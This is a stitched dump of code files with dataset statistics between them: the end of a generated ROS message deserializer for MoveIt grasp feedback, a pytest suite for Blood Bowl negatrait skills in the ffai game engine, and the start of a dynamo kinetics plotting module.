end += 32
self.action_feedback.feedback.object.object.surface.coef = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.grasps = []
for i in range(0, length):
val1 = moveit_msgs.msg.Grasp()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.id = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.id = str[start:end]
_v304 = val1.pre_grasp_posture
_v305 = _v304.header
start = end
end += 4
(_v305.seq,) = _get_struct_I().unpack(str[start:end])
_v306 = _v305.stamp
_x = _v306
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v305.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v305.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v304.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3 = str[start:end].decode('utf-8', 'rosmsg')
else:
val3 = str[start:end]
_v304.joint_names.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v304.points = []
for i in range(0, length):
val3 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_v307 = val3.time_from_start
_x = _v307
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v304.points.append(val3)
_v308 = val1.grasp_posture
_v309 = _v308.header
start = end
end += 4
(_v309.seq,) = _get_struct_I().unpack(str[start:end])
_v310 = _v309.stamp
_x = _v310
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v309.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v309.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v308.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3 = str[start:end].decode('utf-8', 'rosmsg')
else:
val3 = str[start:end]
_v308.joint_names.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v308.points = []
for i in range(0, length):
val3 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_v311 = val3.time_from_start
_x = _v311
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v308.points.append(val3)
_v312 = val1.grasp_pose
_v313 = _v312.header
start = end
end += 4
(_v313.seq,) = _get_struct_I().unpack(str[start:end])
_v314 = _v313.stamp
_x = _v314
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v313.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v313.frame_id = str[start:end]
_v315 = _v312.pose
_v316 = _v315.position
_x = _v316
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v317 = _v315.orientation
_x = _v317
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
start = end
end += 8
(val1.grasp_quality,) = _get_struct_d().unpack(str[start:end])
_v318 = val1.pre_grasp_approach
_v319 = _v318.direction
_v320 = _v319.header
start = end
end += 4
(_v320.seq,) = _get_struct_I().unpack(str[start:end])
_v321 = _v320.stamp
_x = _v321
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v320.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v320.frame_id = str[start:end]
_v322 = _v319.vector
_x = _v322
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v318
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v323 = val1.post_grasp_retreat
_v324 = _v323.direction
_v325 = _v324.header
start = end
end += 4
(_v325.seq,) = _get_struct_I().unpack(str[start:end])
_v326 = _v325.stamp
_x = _v326
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v325.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v325.frame_id = str[start:end]
_v327 = _v324.vector
_x = _v327
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v323
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v328 = val1.post_place_retreat
_v329 = _v328.direction
_v330 = _v329.header
start = end
end += 4
(_v330.seq,) = _get_struct_I().unpack(str[start:end])
_v331 = _v330.stamp
_x = _v331
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v330.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v330.frame_id = str[start:end]
_v332 = _v329.vector
_x = _v332
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v328
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
start = end
end += 4
(val1.max_contact_force,) = _get_struct_f().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.allowed_touch_objects = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8', 'rosmsg')
else:
val2 = str[start:end]
val1.allowed_touch_objects.append(val2)
self.action_feedback.feedback.object.grasps.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
    """Return the shared Struct genpy provides for uint32 length prefixes.

    genpy pre-builds this one, so unlike the other getters no lazy
    initialization is required here.
    """
    return _struct_I
_struct_2I = None
def _get_struct_2I():
    """Return a cached Struct for '<2I' (two little-endian uint32), creating it on first use."""
    global _struct_2I
    cached = _struct_2I
    if cached is None:
        _struct_2I = cached = struct.Struct("<2I")
    return cached
_struct_2f = None
def _get_struct_2f():
    """Return a cached Struct for '<2f' (two little-endian float32), creating it on first use."""
    global _struct_2f
    cached = _struct_2f
    if cached is None:
        _struct_2f = cached = struct.Struct("<2f")
    return cached
_struct_2i = None
def _get_struct_2i():
    """Return a cached Struct for '<2i' (two little-endian int32), creating it on first use."""
    global _struct_2i
    cached = _struct_2i
    if cached is None:
        _struct_2i = cached = struct.Struct("<2i")
    return cached
_struct_3I = None
def _get_struct_3I():
    """Return a cached Struct for '<3I' (three little-endian uint32), creating it on first use."""
    global _struct_3I
    cached = _struct_3I
    if cached is None:
        _struct_3I = cached = struct.Struct("<3I")
    return cached
_struct_3d = None
def _get_struct_3d():
    """Return a cached Struct for '<3d' (three little-endian float64), creating it on first use."""
    global _struct_3d
    cached = _struct_3d
    if cached is None:
        _struct_3d = cached = struct.Struct("<3d")
    return cached
_struct_4d = None
def _get_struct_4d():
    """Return a cached Struct for '<4d' (four little-endian float64), creating it on first use."""
    global _struct_4d
    cached = _struct_4d
    if cached is None:
        _struct_4d = cached = struct.Struct("<4d")
    return cached
_struct_B = None
def _get_struct_B():
    """Return a cached Struct for '<B' (one unsigned byte), creating it on first use."""
    global _struct_B
    cached = _struct_B
    if cached is None:
        _struct_B = cached = struct.Struct("<B")
    return cached
_struct_B2I = None
def _get_struct_B2I():
    """Return a cached Struct for '<B2I' (one byte, then two little-endian uint32), creating it on first use."""
    global _struct_B2I
    cached = _struct_B2I
    if cached is None:
        _struct_B2I = cached = struct.Struct("<B2I")
    return cached
_struct_B3I = None
def _get_struct_B3I():
    """Return a cached Struct for '<B3I' (one byte, then three little-endian uint32), creating it on first use."""
    global _struct_B3I
    cached = _struct_B3I
    if cached is None:
        _struct_B3I = cached = struct.Struct("<B3I")
    return cached
_struct_IBI = None
def _get_struct_IBI():
    """Return a cached Struct for '<IBI' (uint32, byte, uint32 — little-endian), creating it on first use."""
    global _struct_IBI
    cached = _struct_IBI
    if cached is None:
        _struct_IBI = cached = struct.Struct("<IBI")
    return cached
_struct_d = None
def _get_struct_d():
    """Return a cached Struct for '<d' (one little-endian float64), creating it on first use."""
    global _struct_d
    cached = _struct_d
    if cached is None:
        _struct_d = cached = struct.Struct("<d")
    return cached
_struct_f = None
def _get_struct_f():
    """Return a cached Struct for '<f' (one little-endian float32), creating it on first use."""
    global _struct_f
    cached = _struct_f
    if cached is None:
        _struct_f = cached = struct.Struct("<f")
    return cached
| 37.485933 | 268 | 0.564829 | 23,233 | 181,207 | 4.145741 | 0.041277 | 0.101829 | 0.075604 | 0.076777 | 0.819265 | 0.805789 | 0.792707 | 0.788887 | 0.763118 | 0.758789 | 0 | 0.040955 | 0.298504 | 181,207 | 4,833 | 269 | 37.493689 | 0.716763 | 0.009409 | 0 | 0.73562 | 1 | 0.000213 | 0.100736 | 0.021702 | 0 | 0 | 0.000056 | 0 | 0 | 1 | 0.004048 | false | 0 | 0.002769 | 0 | 0.011717 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7c84ab05728975d28b7e455afcc9b9038da03c95 | 16,089 | py | Python | tests/game/test_negatraits.py | gsverhoeven/ffai | 673ff00e1aac905381cdfb1228ccfcfccda97d1f | [
"Apache-2.0"
] | 3 | 2019-03-05T16:43:37.000Z | 2020-04-11T14:24:58.000Z | tests/game/test_negatraits.py | gsverhoeven/ffai | 673ff00e1aac905381cdfb1228ccfcfccda97d1f | [
"Apache-2.0"
] | 1 | 2019-02-24T23:04:16.000Z | 2019-02-24T23:04:16.000Z | tests/game/test_negatraits.py | gsverhoeven/ffai | 673ff00e1aac905381cdfb1228ccfcfccda97d1f | [
"Apache-2.0"
] | null | null | null | import pytest
from tests.util import *
@pytest.mark.parametrize("trait", [[Skill.BONE_HEAD, Bonehead], [Skill.REALLY_STUPID, ReallyStupid], [Skill.WILD_ANIMAL, WildAnimal]])
def test_negatrait_pass_allows_player_action(trait):
    """A passed negatrait roll (fixed 6) keeps the action alive and lets the player move."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    players = game.get_players_on_pitch(team)
    player = players[1]
    player.extra_skills = [trait[0]]  # trait is [Skill, proc class]; only the Skill is used here
    D6.FixedRolls.clear()
    D6.fix_result(6)  # pass trait test
    game.step(Action(ActionType.START_MOVE, player=player))
    # check the player turn has not ended
    assert game.state.active_player is player
    # check the player state
    if trait[0] is Skill.BONE_HEAD:
        assert not player.state.bone_headed
    elif trait[0] is Skill.REALLY_STUPID:
        assert not player.state.really_stupid
    # check the player can continue move
    to = Square(player.position.x, player.position.y + 1)
    game.step(Action(ActionType.MOVE, player=player, position=to))
    assert player.position == to
@pytest.mark.parametrize("trait", [[Skill.BONE_HEAD, Bonehead], [Skill.REALLY_STUPID, ReallyStupid], [Skill.WILD_ANIMAL, WildAnimal]])
def test_negatrait_fail_ends_turn(trait):
    """A failed negatrait roll (fixed 1) ends the player's turn and sets the matching state flag."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    players = game.get_players_on_pitch(team)
    player = players[1]
    player.extra_skills = [trait[0]]
    D6.FixedRolls.clear()
    D6.fix_result(1)  # fail trait test
    game.step(Action(ActionType.START_MOVE, player=player))
    # check the player turn has ended
    assert game.state.active_player is not player
    # check the player state (Wild Animal has no persistent state flag)
    if trait[0] is Skill.BONE_HEAD:
        assert player.state.bone_headed
    elif trait[0] is Skill.REALLY_STUPID:
        assert player.state.really_stupid
def test_take_root_fail_does_not_end_block_action():
    """Failing Take Root during a block action roots the player but does not end the action."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    attacker, defender = get_block_players(game, team)
    attacker.extra_skills = [Skill.TAKE_ROOT]
    D6.FixedRolls.clear()
    D6.fix_result(1)  # fail take root test
    game.step(Action(ActionType.START_BLOCK, player=attacker))
    # check the player turn has not ended
    assert game.state.active_player is attacker
def test_take_root_ends_move_turn():
    """Failing Take Root on a move action ends the player's turn (a rooted player cannot move)."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    players = game.get_players_on_pitch(team)
    player = players[1]
    player.extra_skills = [Skill.TAKE_ROOT]
    D6.FixedRolls.clear()
    D6.fix_result(1)  # fail trait test
    game.step(Action(ActionType.START_MOVE, player=player))
    # check the player turn has ended
    assert game.state.active_player is not player
def test_take_root_fail_reduces_ma_and_prevents_movement():
    """Failing Take Root drops the player's MA to 0 and removes MOVE from the available actions."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    players = game.get_players_on_pitch(team)
    player = players[1]
    player.extra_skills = [Skill.TAKE_ROOT]
    D6.FixedRolls.clear()
    D6.fix_result(1)  # fail trait test
    game.step(Action(ActionType.START_MOVE, player=player))
    # check the player ma is now 0
    assert player.get_ma() == 0
    for action in game.get_available_actions():
        assert not action.action_type == ActionType.MOVE
# no wild animal test as wild animal has no state impact
@pytest.mark.parametrize("trait", [Skill.BONE_HEAD, Skill.REALLY_STUPID])
def test_negatrait_success_resets_player_state(trait):
    """A passed negatrait roll clears a previously-set bone_headed/really_stupid flag."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    players = game.get_players_on_pitch(team)
    player = players[1]
    player.extra_skills = [trait]
    # pre-set the negative state so the test verifies it gets reset
    if trait is Skill.BONE_HEAD:
        player.state.bone_headed = True
    elif trait is Skill.REALLY_STUPID:
        player.state.really_stupid = True
    D6.FixedRolls.clear()
    D6.fix_result(6)  # pass trait test
    game.step(Action(ActionType.START_MOVE, player=player))
    # check the player turn has not ended
    assert game.state.active_player is player
    # check the player state
    if trait is Skill.BONE_HEAD:
        assert not player.state.bone_headed
    elif trait is Skill.REALLY_STUPID:
        assert not player.state.really_stupid
@pytest.mark.parametrize("dice_value", [1,2,3])
def test_really_stupid_fails_without_support(dice_value):
    """Without an adjacent teammate, Really Stupid fails on rolls of 1-3 (needs 4+ unsupported)."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    players = game.get_players_on_pitch(team)
    player = players[1]
    player.extra_skills = [Skill.REALLY_STUPID]
    game.put(player, Square(5, 5))  # isolate the player so no teammate is adjacent
    adjacent = game.get_adjacent_teammates(player)
    assert len(adjacent) == 0
    D6.FixedRolls.clear()
    D6.fix_result(dice_value)  # fail trait test
    game.set_available_actions()
    game.step(Action(ActionType.START_MOVE, player=player))
    # check the player turn has ended
    assert game.state.active_player is not player
    # check the player state
    assert player.state.really_stupid
@pytest.mark.parametrize("dice_value", [2,3])
def test_really_stupid_passes_with_support(dice_value):
    """With a non-stupid adjacent teammate, Really Stupid passes on rolls of 2-3 (2+ supported)."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    players = game.get_players_on_pitch(team)
    player = players[1]
    player.extra_skills = [Skill.REALLY_STUPID]
    team_mate = players[2]
    assert not team_mate.has_skill(Skill.REALLY_STUPID)
    game.put(player, Square(5, 5))
    game.put(team_mate, Square(5, 6))  # adjacent square -> provides support
    adjacent = game.get_adjacent_teammates(player)
    assert len(adjacent) == 1
    D6.FixedRolls.clear()
    D6.fix_result(dice_value)  # pass trait test if supported
    game.set_available_actions()
    game.step(Action(ActionType.START_MOVE, player=player))
    # check the player turn has not ended
    assert game.state.active_player is player
    # check the player state
    assert not player.state.really_stupid
@pytest.mark.parametrize("dice_value", [2,3])
def test_really_stupid_fails_if_support_is_really_stupid(dice_value):
    """An adjacent teammate who is also Really Stupid does not count as support."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    players = game.get_players_on_pitch(team)
    player = players[1]
    player.extra_skills = [Skill.REALLY_STUPID]
    team_mate = players[2]
    team_mate.extra_skills.append(Skill.REALLY_STUPID)  # supporter is itself Really Stupid
    game.put(player, Square(5, 5))
    game.put(team_mate, Square(5,6))
    adjacent = game.get_adjacent_teammates(player)
    assert len(adjacent) == 1
    D6.FixedRolls.clear()
    D6.fix_result(dice_value)  # fail trait test if supported by really stupid player
    game.set_available_actions()
    game.step(Action(ActionType.START_MOVE, player=player))
    # check the player turn has ended
    assert game.state.active_player is not player
    # check the player state
    assert player.state.really_stupid  # check state
@pytest.mark.parametrize("action_type", [ActionType.START_MOVE, ActionType.START_FOUL, ActionType.START_HANDOFF, ActionType.START_PASS])
def test_wild_animal_fails_without_block_or_blitz(action_type):
    """Wild Animal fails a roll of 2 for any action that is not a block or blitz (needs 4+)."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    players = game.get_players_on_pitch(team)
    player = players[1]
    player.extra_skills = [Skill.WILD_ANIMAL]
    D6.FixedRolls.clear()
    D6.fix_result(2)  # fails without block/blitz
    game.step(Action(action_type, player=player))
    # check the player turn has ended
    assert game.state.active_player is not player
    assert game.has_report_of_type(OutcomeType.FAILED_WILD_ANIMAL)
@pytest.mark.parametrize("action_type", [ActionType.START_BLITZ, ActionType.START_BLOCK])
def test_wild_animal_passes_when_block_or_blitz(action_type):
    """Wild Animal passes the same roll of 2 when the action is a block or blitz (2+ suffices)."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    attacker, defender = get_block_players(game, team)  # need adjacent players here.
    attacker.extra_skills = [Skill.WILD_ANIMAL]
    D6.FixedRolls.clear()
    D6.fix_result(2)  # a 2 would fail without block/blitz, but passes here
    game.step(Action(action_type, player=attacker))
    # check the roll succeeded rather than failed
    assert not game.has_report_of_type(OutcomeType.FAILED_WILD_ANIMAL)
    assert game.has_report_of_type(OutcomeType.SUCCESSFUL_WILD_ANIMAL)
def test_take_root_doesnt_trigger_if_rooted():
    """An already-rooted player does not roll Take Root again when starting an action."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    players = game.get_players_on_pitch(team)
    player = players[1]
    player.extra_skills = [Skill.TAKE_ROOT]
    player.state.taken_root = True
    D6.FixedRolls.clear()
    D6.fix_result(2)  # would pass take root if the roll happened
    game.step(Action(ActionType.START_MOVE, player=player))
    assert not game.has_report_of_type(OutcomeType.SUCCESSFUL_TAKE_ROOT)
def test_rooted_players_cannot_start_a_move_or_blitz():
    """A rooted player may not start MOVE/BLITZ, but may still BLOCK, and PASS/HANDOFF/FOUL
    when the respective precondition (carrying the ball / adjacent downed opponent) holds."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    player, defender = get_block_players(game, team)  # need adjacent players here.
    player.extra_skills = [Skill.TAKE_ROOT]
    player.state.taken_root = True
    # need to end turn here as available actions were set before taken_root happened.
    game.step(Action(ActionType.END_TURN))
    game.step(Action(ActionType.END_TURN))
    actions = game.get_available_actions()
    for action in actions:
        if action.action_type is ActionType.START_MOVE:
            assert player not in action.players
        if action.action_type is ActionType.START_BLITZ:
            assert player not in action.players
        if action.action_type is ActionType.START_BLOCK:
            assert player in action.players
        if action.action_type is ActionType.START_PASS:
            if game.get_ball_carrier() == player:
                assert player in action.players
        if action.action_type is ActionType.START_HANDOFF:
            if game.get_ball_carrier() == player:
                assert player in action.players
        if action.action_type is ActionType.START_FOUL:
            if len(game.get_adjacent_opponents(player, down=True, standing=False)) > 0:
                assert player in action.players
def test_take_root_not_removed_on_end_turn():
    """The taken_root state persists across a simple end of turn."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    players = game.get_players_on_pitch(team)
    player = players[1]
    player.extra_skills = [Skill.TAKE_ROOT]
    player.state.taken_root = True
    game.step(Action(ActionType.END_TURN))
    assert player.state.taken_root
def test_take_root_removed_on_touchdown():
    """The taken_root state is cleared when a touchdown ends the drive."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    players = game.get_players_on_pitch(team)
    player = players[1]
    player.extra_skills = [Skill.TAKE_ROOT]
    player.state.taken_root = True
    # a different player scores while the rooted player stays put
    scoring_player = players[2]
    game.move(scoring_player, Square(2, 5))
    game.get_ball().move_to(scoring_player.position)
    game.get_ball().is_carried = True
    assert not game.arena.is_in_opp_endzone(scoring_player.position, scoring_player.team == game.state.home_team)
    to = Square(1, 5)
    game.set_available_actions()
    game.step(Action(ActionType.START_MOVE, player=scoring_player))
    game.step(Action(ActionType.MOVE, player=scoring_player, position=to))
    assert game.has_report_of_type(OutcomeType.TOUCHDOWN)
    assert not player.state.taken_root
def test_take_root_removed_on_new_half():
    """The taken_root state is cleared when the half ends."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    players = game.get_players_on_pitch(team)
    player = players[1]
    player.extra_skills = [Skill.TAKE_ROOT]
    player.state.taken_root = True
    # burn turns until the first half ends (i < 18 is a safety bound against infinite loops)
    i = 0
    while game.state.half == 1 and i < 18:
        game.step(Action(ActionType.END_TURN))
        i += 1
    assert game.has_report_of_type(OutcomeType.END_OF_FIRST_HALF)
    assert not player.state.taken_root
def test_take_root_removed_on_knockdown():
    """The taken_root state is cleared when the rooted player is knocked down."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0  # ensure no reroll prompt
    attacker, defender = get_block_players(game, team)
    defender.extra_skills = [Skill.TAKE_ROOT]
    defender.state.taken_root = True
    assert not defender.has_skill(Skill.BLOCK)
    attacker.extra_skills = [Skill.BLOCK]  # Both Down then knocks down only the defender
    BBDie.clear_fixes()
    BBDie.fix_result(BBDieResult.BOTH_DOWN)
    game.step(Action(ActionType.START_BLOCK, player=attacker))
    game.step(Action(ActionType.BLOCK, position=defender.position))
    game.step(Action(ActionType.SELECT_BOTH_DOWN))
    assert not defender.state.up
    assert game.has_report_of_type(OutcomeType.KNOCKED_DOWN)
    assert not defender.state.taken_root
def test_taken_root_players_may_not_follow_up():
    """A rooted attacker gets no FOLLOW_UP option after a Defender Down result."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0
    attacker, defender = get_block_players(game, team)
    attacker.extra_skills = [Skill.TAKE_ROOT]
    attacker.state.taken_root = True
    attacker.extra_st = defender.get_st() - attacker.get_st() + 1  # make this a 2 die block.
    # it's a 2 dice block
    BBDie.clear_fixes()
    BBDie.fix_result(BBDieResult.DEFENDER_DOWN)
    game.step(Action(ActionType.START_BLOCK, player=attacker))
    game.step(Action(ActionType.BLOCK, position=defender.position))
    game.step(Action(ActionType.SELECT_DEFENDER_DOWN))
    game.step(Action(ActionType.PUSH, position=game.get_available_actions()[0].positions[0]))
    for action in game.get_available_actions():
        assert action.action_type is not ActionType.FOLLOW_UP
def test_taken_root_players_may_not_follow_up_push():
    """A rooted attacker gets no FOLLOW_UP option after a Push result."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0
    attacker, defender = get_block_players(game, team)
    attacker.extra_skills = [Skill.TAKE_ROOT]
    attacker.state.taken_root = True
    attacker.extra_st = defender.get_st() - attacker.get_st() + 1  # make this a 2 die block.
    # it's a 2 dice block
    BBDie.clear_fixes()
    BBDie.fix_result(BBDieResult.PUSH)
    game.step(Action(ActionType.START_BLOCK, player=attacker))
    game.step(Action(ActionType.BLOCK, position=defender.position))
    game.step(Action(ActionType.SELECT_PUSH))
    game.step(Action(ActionType.PUSH, position=game.get_available_actions()[0].positions[0]))
    for action in game.get_available_actions():
        assert action.action_type is not ActionType.FOLLOW_UP
def test_taken_root_players_may_not_be_pushed():
    """A rooted defender cannot be pushed: no PUSH/FOLLOW_UP actions and position is unchanged."""
    game = get_game_turn()
    team = game.get_agent_team(game.actor)
    team.state.rerolls = 0
    attacker, defender = get_block_players(game, team)
    defender.extra_skills = [Skill.TAKE_ROOT]
    defender.state.taken_root = True
    attacker.extra_st = defender.get_st() - attacker.get_st() + 1  # make this a 2 die block.
    def_pos = defender.position
    # it's a 2 dice block
    BBDie.clear_fixes()
    BBDie.fix_result(BBDieResult.PUSH)
    BBDie.fix_result(BBDieResult.PUSH)
    game.step(Action(ActionType.START_BLOCK, player=attacker))
    game.step(Action(ActionType.BLOCK, position=defender.position))
    game.step(Action(ActionType.SELECT_PUSH))
    for action in game.get_available_actions():
        assert action.action_type is not ActionType.PUSH
    # game.step(Action(ActionType.PUSH, position=game.get_available_actions()[0].positions[0]))
    for action in game.get_available_actions():
        assert action.action_type is not ActionType.FOLLOW_UP
    assert defender.position is def_pos
| 33.588727 | 136 | 0.72217 | 2,308 | 16,089 | 4.798094 | 0.077556 | 0.044248 | 0.042984 | 0.069352 | 0.856601 | 0.842243 | 0.818223 | 0.778942 | 0.762146 | 0.738396 | 0 | 0.009367 | 0.183852 | 16,089 | 478 | 137 | 33.658996 | 0.833981 | 0.102679 | 0 | 0.743034 | 0 | 0 | 0.004661 | 0 | 0 | 0 | 0 | 0 | 0.154799 | 1 | 0.06192 | false | 0.01548 | 0.006192 | 0 | 0.068111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7c97f85a93be22f488e5b100d6f1e0188dea1253 | 75,820 | py | Python | dynamo/plot/utils_dynamics.py | xing-lab-pitt/dynamo-release | 76c1f2a270dd6722b88f4700aac1a1a725a0c261 | [
"BSD-3-Clause"
] | 236 | 2019-07-09T22:06:21.000Z | 2022-03-31T17:56:07.000Z | dynamo/plot/utils_dynamics.py | xing-lab-pitt/dynamo-release | 76c1f2a270dd6722b88f4700aac1a1a725a0c261 | [
"BSD-3-Clause"
] | 115 | 2019-07-12T19:06:21.000Z | 2022-03-31T17:34:18.000Z | dynamo/plot/utils_dynamics.py | xing-lab-pitt/dynamo-release | 76c1f2a270dd6722b88f4700aac1a1a725a0c261 | [
"BSD-3-Clause"
] | 34 | 2019-07-10T03:34:04.000Z | 2022-03-22T12:44:22.000Z | import numpy as np
import pandas as pd
from scipy.sparse import issparse
from matplotlib.lines import Line2D
from ..tools.moments import (
prepare_data_no_splicing,
prepare_data_has_splicing,
prepare_data_mix_has_splicing,
prepare_data_mix_no_splicing,
)
from ..tools.utils import get_mapper
from .utils import _to_hex
def plot_kin_det(
    adata,
    genes,
    has_splicing,
    use_smoothed,
    log_unnormalized,
    t,
    T,
    T_uniq,
    unit,
    X_data,
    X_fit_data,
    logLL,
    true_p,
    grp_len,
    sub_plot_n,
    ncols,
    boxwidth,
    gs,
    fig_mat,
    gene_order,
    y_log_scale,
    true_param_prefix,
    true_params,
    est_params,
    show_variance,
    show_kin_parameters,
):
    """Draw per-gene subplots of a deterministic kinetic-model fit over labeling time.

    For each gene in `genes`, one subplot per species (unspliced/spliced labeled
    when `has_splicing`, otherwise new RNA) is drawn into the GridSpec `gs`:
